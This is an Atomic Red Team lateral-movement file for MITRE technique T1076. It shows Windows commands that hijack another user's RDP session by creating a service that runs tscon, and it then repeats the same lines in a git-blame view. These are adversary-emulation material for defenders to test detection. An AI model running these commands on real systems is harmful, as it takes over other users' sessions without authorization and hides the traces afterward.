Windows/Lateral_Movement/Remote_Desktop_Protocol.md

## Remote Desktop Protocol

MITRE ATT&CK Technique: [T1076](https://attack.mitre.org/wiki/Technique/T1076)


### [RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) — how to hijack RDS and RemoteApp sessions transparently to move through an organization

retrieve the session ID:

    query user

Set the session ID and rdp-tcp# retrieved from `query user`

    sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"

Access the session:

    net start sesshijack

Clean up afterward:

    sc.exe delete sesshijack
Lateral Movement 2018-04-06 08:21:28 -04:00			`## Remote Desktop Protocol`

			`MITRE ATT&CK Technique: [T1076](https://attack.mitre.org/wiki/Technique/T1076)`


Adding starter implementation of Atomic Red Team Automation Framework, as well as Atomic Red Team testing framework 2018-04-15 17:54:49 -07:00			`### [RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) — how to hijack RDS and RemoteApp sessions transparently to move through an organization`
Lateral Movement 2018-04-06 08:21:28 -04:00
			`retrieve the session ID:`

			`query user`

			Set the session ID and rdp-tcp# retrieved from `query user`

Adding starter implementation of Atomic Red Team Automation Framework, as well as Atomic Red Team testing framework 2018-04-15 17:54:49 -07:00			`sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"`
Lateral Movement 2018-04-06 08:21:28 -04:00
			`Access the session:`

			`net start sesshijack`
Adding starter implementation of Atomic Red Team Automation Framework, as well as Atomic Red Team testing framework 2018-04-15 17:54:49 -07:00
			`Clean up afterward:`

			`sc.exe delete sesshijack`